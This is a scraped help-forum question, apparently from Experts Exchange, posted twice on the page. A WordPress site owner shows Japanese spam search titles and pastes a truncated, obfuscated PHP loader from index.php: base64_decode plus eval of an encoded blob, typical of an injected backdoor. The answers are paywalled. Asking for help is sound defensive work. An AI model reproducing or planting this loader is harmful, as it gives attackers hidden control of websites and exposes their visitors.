asked on
I have been asked to investigate the following website
If I type in "aurumsearch" into the google search box, I get the following page:
The link works perfectly well and goes to the correct page
If I inspect the page, the element that brings this link up is:
<h3 class="LC20lb DKV0Md">呼出ハーン Cole Haan レディース 袋 ショルダーバッグ ...</h3>
If I go to the site host and look at the index.php page code in filemanager (Plesk control panel) of the wordpress site, the following shows up (only part of the page text shown):
Index.php
<?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZUhNT05nbXhBQkt3aHBhWWRER25yUlp1Rm9pbFFXWFN0Y1VMUGJreUNqVnZ6c3FUZkpFSWxpbkFTdVdnaFlGWG1aS3ZNa3RqSEx5SVVid0VPcE5HZXFmY3pzSlZ4ckRhUENCUm9kUVR6azlYS2loU3hXRFZxVzlWTjNkRXF0OVZNdEVJeVZ1WEZSQ1N4SllQeU5TUEtwOUlOM1Mwdk5kMEZ4SjdrT1paeXd1bXlqREl2M0xaczI1b3lObVpxM0xQRnhkNGxpbW95MkQwdjI5SU10RElNeFRaRkdZN2tPWldNcDVyTXRFYXN3WTRsaW1veTJEMHYyOUlNdERJTXh1Sk1OZENGTkNTeHdodVR4WVp5d2hiZGlEVnNrMDlUd1RaVGlkRU1pRFZzd2h3VHJDU3h3aHVUeFlaeXdtV01wNXJNdEVhc0U5RWx0RVBNaW5iZDJTMXFXZ29LcDVaTXhxWkZOQ1N4d2h1VHhodVR4aHVkdFNhc3doOVR0UzFxV2dvS3A1Wk14dWJxM0xWS3A1akZHTDFxV1haQVgwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjBtVU9mTFVmd1h1eVdVQ3EyZlpBWDBGVHhodVR4aHVUeFlyTU5kQ04zU0VNdDlYTXh1SnYyOUljeFlrRERkblIxWWZOMVNSUlU5cExEZGRMRUVPTGZER2N4WXRPZmdSTEdKN2tPYnVUeGh1VHhodVR0UzFxV2dvcTJEMHMzWTBGeExyczI0Q1RRU0RmSmd6ZlVMb2YxU25OMXlVZkpFdHBmbXpmMU9DVFF5WVJVU1VGUkNTeHUwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjFkVURVREdSRUxHT2Y1UkxKREdjaUxWTXBmWkFYMEZUeGh1VHhodVR4WXJNTmRDTjNTRU10OVhNeHVKdjI5SWN4WWtERGRuUjFZZk4xTGRSZkR6RERPQ1RrUVZueEo3a09idVR4aHVUeGh1VHhMVnlOUzFzaU91ekdZck1OZENOMkQ0eXBuYmR0U2Fzd0o3a09idVR4aHVUeGh1VHRTMXFXZ292MmdhcTJmYmR0U2Fzd0o3a09idVR4aHVvcERDcTJEN2tPYnVUeGh1VHhodVR4TFZ5TlMxc2lPdXpHWVdLcGdFTjJNRU1VOXJzMjUweXA1
Any ideas what is going on here - is it a hack?
If I type in "aurumsearch" into the google search box, I get the following page:
The link works perfectly well and goes to the correct pageIf I inspect the page, the element that brings this link up is:
<h3 class="LC20lb DKV0Md">呼出ハーン Cole Haan レディース 袋 ショルダーバッグ ...</h3>
If I go to the site host and look at the index.php page code in filemanager (Plesk control panel) of the wordpress site, the following shows up (only part of the page text shown):
Index.php
<?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iZUhNT05nbXhBQkt3aHBhWWRER25yUlp1Rm9pbFFXWFN0Y1VMUGJreUNqVnZ6c3FUZkpFSWxpbkFTdVdnaFlGWG1aS3ZNa3RqSEx5SVVid0VPcE5HZXFmY3pzSlZ4ckRhUENCUm9kUVR6azlYS2loU3hXRFZxVzlWTjNkRXF0OVZNdEVJeVZ1WEZSQ1N4SllQeU5TUEtwOUlOM1Mwdk5kMEZ4SjdrT1paeXd1bXlqREl2M0xaczI1b3lObVpxM0xQRnhkNGxpbW95MkQwdjI5SU10RElNeFRaRkdZN2tPWldNcDVyTXRFYXN3WTRsaW1veTJEMHYyOUlNdERJTXh1Sk1OZENGTkNTeHdodVR4WVp5d2hiZGlEVnNrMDlUd1RaVGlkRU1pRFZzd2h3VHJDU3h3aHVUeFlaeXdtV01wNXJNdEVhc0U5RWx0RVBNaW5iZDJTMXFXZ29LcDVaTXhxWkZOQ1N4d2h1VHhodVR4aHVkdFNhc3doOVR0UzFxV2dvS3A1Wk14dWJxM0xWS3A1akZHTDFxV1haQVgwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjBtVU9mTFVmd1h1eVdVQ3EyZlpBWDBGVHhodVR4aHVUeFlyTU5kQ04zU0VNdDlYTXh1SnYyOUljeFlrRERkblIxWWZOMVNSUlU5cExEZGRMRUVPTGZER2N4WXRPZmdSTEdKN2tPYnVUeGh1VHhodVR0UzFxV2dvcTJEMHMzWTBGeExyczI0Q1RRU0RmSmd6ZlVMb2YxU25OMXlVZkpFdHBmbXpmMU9DVFF5WVJVU1VGUkNTeHUwRlR4aHVUeGh1VHhZck1OZENOM1NFTXQ5WE14dUp2MjlJY3hZa0REZG5SMVlmTjFkVURVREdSRUxHT2Y1UkxKREdjaUxWTXBmWkFYMEZUeGh1VHhodVR4WXJNTmRDTjNTRU10OVhNeHVKdjI5SWN4WWtERGRuUjFZZk4xTGRSZkR6RERPQ1RrUVZueEo3a09idVR4aHVUeGh1VHhMVnlOUzFzaU91ekdZck1OZENOMkQ0eXBuYmR0U2Fzd0o3a09idVR4aHVUeGh1VHRTMXFXZ292MmdhcTJmYmR0U2Fzd0o3a09idVR4aHVvcERDcTJEN2tPYnVUeGh1VHhodVR4TFZ5TlMxc2lPdXpHWVdLcGdFTjJNRU1VOXJzMjUweXA1
Any ideas what is going on here - is it a hack?
Learn from the best
Network and collaborate with thousands of CTOs, CISOs, and IT Pros rooting for you and your success.
Andrew Hancock - VMware vExpert
See if this solution works for you by signing up for a 7 day free trial.
Unlock 1 Answer and 7 Comments.
Try for 7 days”The time we save is the biggest benefit of E-E to our team. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange.
Our community of experts have been thoroughly vetted for their expertise and industry experience.
The Distinguished Expert awards are presented to the top veteran and rookie experts to earn the most points in the top 50 topics.